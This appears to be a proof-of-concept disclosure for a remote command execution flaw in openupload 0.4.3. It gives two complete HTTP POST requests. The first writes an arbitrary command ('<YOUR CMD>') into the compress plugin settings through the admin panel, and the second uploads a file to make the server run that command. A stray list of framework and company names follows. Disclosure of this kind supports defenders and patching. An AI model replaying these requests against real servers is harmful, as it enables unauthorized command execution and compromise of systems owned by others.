By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.
Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.
openupload Stable version 0.4.3
Log in to the backend and click on the function: Administration ->Plugins ->compress
Add new “command” directive and save:
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 183
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
action=u&step=3&description=123&emailme=no&compress=0
The commands we write will be executed normally.
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent